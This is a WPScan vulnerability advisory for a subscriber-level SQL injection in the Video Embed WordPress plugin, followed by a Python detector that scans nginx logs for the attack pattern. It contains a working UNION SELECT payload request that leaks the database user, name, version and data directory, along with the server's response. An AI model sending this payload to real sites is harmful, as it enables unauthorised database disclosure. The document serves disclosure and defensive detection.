Wpvulndb WPVDB-ID:A8FD8DD4-5B5E-462E-8DAE-065D5E2D003A
History: May 19, 2021 - 12:00 a.m.

Video Embed <= 1.0 - Authenticated (subscriber+) SQL Injection

2021-05-19 00:00:00
wpscan.com
video embed
plugin
sql injection
authentication
subscriber
forced browsing
security vulnerability

EPSS: 0.001 (percentile: 44.7%)

The `id` GET parameter of one of the plugin's pages (available via forced browsing) is not sanitised, validated or escaped before being used in a SQL statement, allowing low-privilege users, such as subscribers, to perform SQL injection.

PoC

Note: The URL `/wp-admin/admin.php?page=edit-video-embed&id=1` is not directly in the menu but can be accessed by forced browsing.

```
GET http://172.28.128.50/wp-admin/admin.php?page=edit-video-embed&id=0+union+select+1%2Ccurrent_user()%2C3%2Cdatabase()%2C%40%40version%2C6%2C@@datadir%3B HTTP/1.1
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [subscriber+]
Host: 172.28.128.50
```

Response

```
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Apr 2021 00:25:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: wp-settings-4=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: wp-settings-time-4=1618619143; expires=Sun, 17-Apr-2022 00:25:43 GMT; Max-Age=31536000; path=/
```

<… snip …>

| Field | Value | Form hint |
|---|---|---|
| Title: | | |
| Video from: | Youtube / Vimeo VideoSuit | |
| Youtube Embed Url: | | Please specify complete path(including ‘http’) |
| Pdf Path: | | Please specify complete path(including ‘http’) |
| Audio Path: | | Please specify complete path(including ‘http’) |
| Useful Link: | /var/lib/mysql/ | Please specify your html content |

<… snip …>
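A log check for the request pattern in the PoC, as an added example that is not part of the advisory or the plugin: it flags hits on `admin.php?page=edit-video-embed` whose `id` is not a plain integer. It assumes nginx `combined`-format access logs; the log lines are constructed (the first reuses the PoC request target from this page), and the function name `suspicious_requests` is hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed nginx "combined" log lines (assumption: default log format).
# The first line reuses the request target shown in the PoC on this page.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Apr/2021:00:25:43 +0000] "GET http://172.28.128.50/wp-admin/admin.php?page=edit-video-embed&id=0+union+select+1%2Ccurrent_user()%2C3%2Cdatabase()%2C%40%40version%2C6%2C@@datadir%3B HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Apr/2021:00:26:01 +0000] "GET /wp-admin/admin.php?page=edit-video-embed&id=12 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Apr/2021:00:27:10 +0000] "GET /wp-admin/admin.php?page=edit-video-embed&id=1&id=1%27 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Apr/2021:00:28:30 +0000] "GET /wp-admin/admin.php?page=other-plugin&id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, then the quoted request line: METHOD TARGET PROTOCOL
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
PLAIN_INT = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return (client_ip, decoded id) for edit-video-embed requests whose
    id parameter is anything other than ASCII digits."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        # urlsplit handles origin-form (/path?...) and absolute-form
        # (http://host/path?...) request targets alike.
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes, turns '+' into space, and keeps
        # every occurrence of a repeated parameter.
        params = parse_qs(parts.query)
        if "edit-video-embed" not in params.get("page", []):
            continue
        for value in params.get("id", []):
            if not PLAIN_INT.fullmatch(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\tid={value!r}")
```

Because the page is reachable by any subscriber-level account, any hit on it from a non-administrator session is worth reviewing even when `id` is numeric.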

